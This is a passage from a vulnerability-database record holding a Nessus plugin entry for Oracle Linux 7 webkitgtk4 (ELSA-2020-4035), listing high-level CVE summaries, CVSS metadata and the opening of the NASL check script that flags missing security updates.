loads. This issue was addressed with improved state management. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8649)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to universal cross site scripting.\n (CVE-2019-8658)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8666, CVE-2019-8671, CVE-2019-8673, CVE-2019-8677, CVE-2019-8678, CVE-2019-8679, CVE-2019-8680, CVE-2019-8681, CVE-2019-8686, CVE-2019-8687)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8669, CVE-2019-8672, CVE-2019-8676, CVE-2019-8683, CVE-2019-8688, CVE-2019-8689)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 13, Safari 13.\n Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8674)\n\n - A logic issue existed in the handling of document loads. This issue was addressed with improved state management. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8690)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8707, CVE-2019-8726, CVE-2019-8733, CVE-2019-8735)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iCloud for Windows 11.0. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8710)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in watchOS 6.1. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8743, CVE-2019-8765)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.1 and iPadOS 13.1, tvOS 13, Safari 13.0.1, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8763)\n\n - A logic issue was addressed with improved state management. This issue is fixed in watchOS 6.1. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8764)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in watchOS 6.1, iCloud for Windows 11.0. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8766)\n\n - Clear History and Website Data did not clear the history. The issue was addressed with improved data deletion. This issue is fixed in macOS Catalina 10.15. A user may be unable to delete browsing history items. (CVE-2019-8768)\n\n - An issue existed in the drawing of web page elements. The issue was addressed with improved logic. This issue is fixed in iOS 13.1 and iPadOS 13.1, macOS Catalina 10.15. Visiting a maliciously crafted website may reveal browsing history. (CVE-2019-8769)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8782)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0, iCloud for Windows 7.15. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8783, CVE-2019-8814, CVE-2019-8815, CVE-2019-8819, CVE-2019-8821, CVE-2019-8822, CVE-2019-8823)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, watchOS 6.1, Safari 13.0.3, iTunes for Windows 12.10.2. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8808, CVE-2019-8812)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, watchOS 6.1, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0, iCloud for Windows 7.15. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8811, CVE-2019-8816, CVE-2019-8820)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8813)\n\n - WebKitGTK and WPE WebKit prior to version 2.24.1 failed to properly apply configured HTTP proxy settings when downloading livestream video (HLS, DASH, or Smooth Streaming), an error resulting in deanonymization.\n This issue was corrected by changing the way livestreams are downloaded. (CVE-2019-11070)\n\n - A denial of service issue was addressed with improved memory handling. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud for Windows 7.17. A malicious website may be able to cause a denial of service. (CVE-2020-3862)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud for Windows 7.17. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2020-3865, CVE-2020-3868)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud for Windows 7.17. Processing maliciously crafted web content may lead to universal cross site scripting.\n (CVE-2020-3867)\n\n - A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. A file URL may be incorrectly processed. (CVE-2020-3885)\n\n - A race condition was addressed with additional validation. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. An application may be able to read restricted memory. (CVE-2020-3894)\n\n - A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2020-3895, CVE-2020-3900)\n\n - A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. A remote attacker may be able to cause arbitrary code execution. (CVE-2020-3897)\n\n - A memory consumption issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. A remote attacker may be able to cause arbitrary code execution. (CVE-2020-3899)\n\n - A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2020-3901)\n\n - An input validation issue was addressed with improved input validation. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. Processing maliciously crafted web content may lead to a cross site scripting attack.\n (CVE-2020-3902)\n\n - WebKitGTK through 2.26.4 and WPE WebKit through 2.26.4 (which are the versions right before 2.28.0) contains a memory corruption issue (use-after-free) that may lead to arbitrary code execution. This issue has been fixed in 2.28.0 with improved memory handling. (CVE-2020-10018)\n\n - A use-after-free issue exists in WebKitGTK before 2.28.1 and WPE WebKit before 2.28.1 via crafted web content that allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash). (CVE-2020-11793)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-10-07T00:00:00", "type": "nessus", "title": "Oracle Linux 7 : webkitgtk4 (ELSA-2020-4035)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8383", "CVE-2019-11070", "CVE-2019-6237", "CVE-2019-6251", "CVE-2019-8506", "CVE-2019-8524", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8544", "CVE-2019-8551", "CVE-2019-8558", "CVE-2019-8559", "CVE-2019-8563", "CVE-2019-8571", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8625", "CVE-2019-8644", "CVE-2019-8649", "CVE-2019-8658", "CVE-2019-8666", "CVE-2019-8669", "CVE-2019-8671", "CVE-2019-8672", "CVE-2019-8673", "CVE-2019-8674", "CVE-2019-8676", "CVE-2019-8677", "CVE-2019-8678", "CVE-2019-8679", "CVE-2019-8680", "CVE-2019-8681", "CVE-2019-8683", "CVE-2019-8684", "CVE-2019-8686", "CVE-2019-8687", "CVE-2019-8688", "CVE-2019-8689", "CVE-2019-8690", "CVE-2019-8707", "CVE-2019-8710", "CVE-2019-8719", "CVE-2019-8720", "CVE-2019-8726", "CVE-2019-8733", "CVE-2019-8735", "CVE-2019-8743", "CVE-2019-8763", "CVE-2019-8764", "CVE-2019-8765", "CVE-2019-8766", "CVE-2019-8768", "CVE-2019-8769", "CVE-2019-8771", "CVE-2019-8782", "CVE-2019-8783", "CVE-2019-8808", "CVE-2019-8811", "CVE-2019-8812", "CVE-2019-8813", "CVE-2019-8814", "CVE-2019-8815", "CVE-2019-8816", "CVE-2019-8819", "CVE-2019-8820", "CVE-2019-8821", "CVE-2019-8822", "CVE-2019-8823", "CVE-2019-8835", "CVE-2019-8844", "CVE-2019-8846", "CVE-2020-10018", "CVE-2020-11793", "CVE-2020-3862", "CVE-2020-3864", "CVE-2020-3865", "CVE-2020-3867", "CVE-2020-3868", "CVE-2020-3885", "CVE-2020-3894", "CVE-2020-3895", "CVE-2020-3897", "CVE-2020-3899", "CVE-2020-3900", "CVE-2020-3901", "CVE-2020-3902"], "modified": "2022-05-25T00:00:00", "cpe": ["cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:webkitgtk4", "p-cpe:/a:oracle:linux:webkitgtk4-devel", "p-cpe:/a:oracle:linux:webkitgtk4-doc", "p-cpe:/a:oracle:linux:webkitgtk4-jsc", "p-cpe:/a:oracle:linux:webkitgtk4-jsc-devel"], "id": "ORACLELINUX_ELSA-2020-4035.NASL", "href": "https://www.tenable.com/plugins/nessus/141259", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2020-4035.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141259);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\n \"CVE-2019-6237\",\n \"CVE-2019-6251\",\n \"CVE-2019-8506\",\n \"CVE-2019-8524\",\n \"CVE-2019-8535\",\n \"CVE-2019-8536\",\n \"CVE-2019-8544\",\n \"CVE-2019-8551\",\n \"CVE-2019-8558\",\n \"CVE-2019-8559\",\n \"CVE-2019-8563\",\n \"CVE-2019-8571\",\n \"CVE-2019-8583\",\n \"CVE-2019-8584\",\n \"CVE-2019-8586\",\n \"CVE-2019-8587\",\n \"CVE-2019-8594\",\n \"CVE-2019-8595\",\n \"CVE-2019-8596\",\n \"CVE-2019-8597\",\n \"CVE-2019-8601\",\n \"CVE-2019-8607\",\n \"CVE-2019-8608\",\n \"CVE-2019-8609\",\n \"CVE-2019-8610\",\n \"CVE-2019-8611\",\n \"CVE-2019-8615\",\n \"CVE-2019-8619\",\n \"CVE-2019-8622\",\n \"CVE-2019-8623\",\n \"CVE-2019-8625\",\n \"CVE-2019-8644\",\n \"CVE-2019-8649\",\n \"CVE-2019-8658\",\n \"CVE-2019-8666\",\n \"CVE-2019-8669\",\n \"CVE-2019-8671\",\n \"CVE-2019-8672\",\n \"CVE-2019-8673\",\n \"CVE-2019-8674\",\n \"CVE-2019-8676\",\n \"CVE-2019-8677\",\n \"CVE-2019-8678\",\n \"CVE-2019-8679\",\n \"CVE-2019-8680\",\n \"CVE-2019-8681\",\n \"CVE-2019-8683\",\n \"CVE-2019-8684\",\n \"CVE-2019-8686\",\n \"CVE-2019-8687\",\n \"CVE-2019-8688\",\n \"CVE-2019-8689\",\n \"CVE-2019-8690\",\n \"CVE-2019-8707\",\n \"CVE-2019-8710\",\n \"CVE-2019-8719\",\n \"CVE-2019-8720\",\n \"CVE-2019-8726\",\n \"CVE-2019-8733\",\n \"CVE-2019-8735\",\n \"CVE-2019-8743\",\n \"CVE-2019-8763\",\n \"CVE-2019-8764\",\n \"CVE-2019-8765\",\n \"CVE-2019-8766\",\n \"CVE-2019-8768\",\n \"CVE-2019-8769\",\n \"CVE-2019-8771\",\n \"CVE-2019-8782\",\n \"CVE-2019-8783\",\n \"CVE-2019-8808\",\n \"CVE-2019-8811\",\n \"CVE-2019-8812\",\n \"CVE-2019-8813\",\n \"CVE-2019-8814\",\n \"CVE-2019-8815\",\n \"CVE-2019-8816\",\n \"CVE-2019-8819\",\n \"CVE-2019-8820\",\n \"CVE-2019-8821\",\n \"CVE-2019-8822\",\n \"CVE-2019-8823\",\n \"CVE-2019-8835\",\n \"CVE-2019-8844\",\n \"CVE-2019-8846\",\n \"CVE-2019-11070\",\n \"CVE-2020-3862\",\n \"CVE-2020-3864\",\n \"CVE-2020-3865\",\n \"CVE-2020-3867\",\n \"CVE-2020-3868\",\n \"CVE-2020-3885\",\n \"CVE-2020-3894\",\n \"CVE-2020-3895\",\n \"CVE-2020-3897\",\n \"CVE-2020-3899\",\n \"CVE-2020-3900\",\n \"CVE-2020-3901\",\n \"CVE-2020-3902\",\n \"CVE-2020-10018\",\n \"CVE-2020-11793\"\n );\n script_bugtraq_id(\n 108497,\n 108566,\n 109328,\n 109329\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n\n script_name(english:\"Oracle Linux 7 : webkitgtk4 (ELSA-2020-4035)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nELSA-2020-4035 advisory.\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-6237,\n CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, CVE-2019-8609,\n CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, CVE-2019-8619)\n\n - WebKitGTK and WPE WebKit prior to version 2.24.1 are vulnerable to address bar spoofing upon certain\n JavaScript redirections. An attacker could cause malicious web content to be displayed as if for a trusted\n URI. This is similar to the CVE-2018-8383 issue in Microsoft Edge. (CVE-2019-6251)\n\n - A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS\n 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously\n crafted web content may lead to arbitrary code execution. (CVE-2019-8506)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously\n crafted web content may lead to arbitrary code execution. (CVE-2019-8524)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 12.2,\n tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted\n web content may lead to arbitrary code execution. (CVE-2019-8535)\n\n - A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 12.2,\n tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing\n maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8536, CVE-2019-8544)\n\n - A logic issue was addressed with improved validation. This issue is fixed in iOS 12.2, tvOS 12.2, Safari\n 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may\n lead to universal cross site scripting. (CVE-2019-8551)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing\n maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8558, CVE-2019-8559,\n CVE-2019-8563)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for\n Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8583, CVE-2019-8601, CVE-2019-8622, CVE-2019-8623)\n\n - A logic issue was addressed with improved state management. This issue is fixed in tvOS 13, iTunes for\n Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing maliciously crafted web\n content may lead to universal cross site scripting. (CVE-2019-8625, CVE-2019-8719)\n\n - A logic issue existed in the handling of synchronous page loads. This issue was addressed with improved\n state management. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes\n for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web\n content may lead to universal cross site scripting. (CVE-2019-8649)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 12.4, macOS Mojave\n 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud\n for Windows 10.6. Processing maliciously crafted web content may lead to universal cross site scripting.\n (CVE-2019-8658)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13,\n iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8666, CVE-2019-8671, CVE-2019-8673, CVE-2019-8677, CVE-2019-8678, CVE-2019-8679, CVE-2019-8680,\n CVE-2019-8681, CVE-2019-8686, CVE-2019-8687)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for\n Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary\n code execution. (CVE-2019-8669, CVE-2019-8672, CVE-2019-8676, CVE-2019-8683, CVE-2019-8688, CVE-2019-8689)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 13, Safari 13.\n Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8674)\n\n - A logic issue existed in the handling of document loads. This issue was addressed with improved state\n management. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for\n Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web\n content may lead to universal cross site scripting. (CVE-2019-8690)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in\n tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing\n maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8707, CVE-2019-8726,\n CVE-2019-8733, CVE-2019-8735)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in\n iCloud for Windows 11.0. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8710)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in\n watchOS 6.1. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8743, CVE-2019-8765)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 13.1 and iPadOS 13.1, tvOS 13, Safari 13.0.1, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud\n for Windows 7.14. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8763)\n\n - A logic issue was addressed with improved state management. This issue is fixed in watchOS 6.1. Processing\n maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8764)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in\n watchOS 6.1, iCloud for Windows 11.0. Processing maliciously crafted web content may lead to arbitrary\n code execution. (CVE-2019-8766)\n\n - Clear History and Website Data did not clear the history. The issue was addressed with improved data\n deletion. This issue is fixed in macOS Catalina 10.15. A user may be unable to delete browsing history\n items. (CVE-2019-8768)\n\n - An issue existed in the drawing of web page elements. The issue was addressed with improved logic. This\n issue is fixed in iOS 13.1 and iPadOS 13.1, macOS Catalina 10.15. Visiting a maliciously crafted website\n may reveal browsing history. (CVE-2019-8769)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8782)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0,\n iCloud for Windows 7.15. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8783, CVE-2019-8814, CVE-2019-8815, CVE-2019-8819, CVE-2019-8821, CVE-2019-8822, CVE-2019-8823)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 13.2 and iPadOS 13.2, tvOS 13.2, watchOS 6.1, Safari 13.0.3, iTunes for Windows 12.10.2. Processing\n maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8808, CVE-2019-8812)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 13.2 and iPadOS 13.2, tvOS 13.2, watchOS 6.1, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for\n Windows 11.0, iCloud for Windows 7.15. Processing maliciously crafted web content may lead to arbitrary\n code execution. (CVE-2019-8811, CVE-2019-8816, CVE-2019-8820)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 13.2 and iPadOS\n 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0. Processing\n maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8813)\n\n - WebKitGTK and WPE WebKit prior to version 2.24.1 failed to properly apply configured HTTP proxy settings\n when downloading livestream video (HLS, DASH, or Smooth Streaming), an error resulting in deanonymization.\n This issue was corrected by changing the way livestreams are downloaded. (CVE-2019-11070)\n\n - A denial of service issue was addressed with improved memory handling. This issue is fixed in iOS 13.3.1\n and iPadOS 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud\n for Windows 7.17. A malicious website may be able to cause a denial of service. (CVE-2020-3862)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 13.3.1 and iPadOS 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0,\n iCloud for Windows 7.17. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2020-3865, CVE-2020-3868)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 13.3.1 and iPadOS\n 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud for\n Windows 7.17. Processing maliciously crafted web content may lead to universal cross site scripting.\n (CVE-2020-3867)\n\n - A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.4 and iPadOS 13.4,\n tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. A\n file URL may be incorrectly processed. (CVE-2020-3885)\n\n - A race condition was addressed with additional validation. This issue is fixed in iOS 13.4 and iPadOS\n 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows\n 7.18. An application may be able to read restricted memory. (CVE-2020-3894)\n\n - A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and\n iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3,\n iCloud for Windows 7.18. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2020-3895, CVE-2020-3900)\n\n - A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and\n iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3,\n iCloud for Windows 7.18. A remote attacker may be able to cause arbitrary code execution. (CVE-2020-3897)\n\n - A memory consumption issue was addressed with improved memory handling. This issue is fixed in iOS 13.4\n and iPadOS 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for\n Windows 7.18. A remote attacker may be able to cause arbitrary code execution. (CVE-2020-3899)\n\n - A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and\n iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3,\n iCloud for Windows 7.18. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2020-3901)\n\n - An input validation issue was addressed with improved input validation. This issue is fixed in iOS 13.4\n and iPadOS 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for\n Windows 7.18. Processing maliciously crafted web content may lead to a cross site scripting attack.\n (CVE-2020-3902)\n\n - WebKitGTK through 2.26.4 and WPE WebKit through 2.26.4 (which are the versions right before 2.28.0)\n contains a memory corruption issue (use-after-free) that may lead to arbitrary code execution. This issue\n has been fixed in 2.28.0 with improved memory handling. (CVE-2020-10018)\n\n - A use-after-free issue exists in WebKitGTK before 2.28.1 and WPE WebKit before 2.28.1 via crafted web\n content that allows remote attackers to execute arbitrary code or cause a denial of service (memory\n corruption and application crash). (CVE-2020-11793)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://linux.oracle.com/errata/ELSA-2020-4035.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-3899\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-10018\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkitgtk4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkitgtk4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkitgtk4-doc\");\n 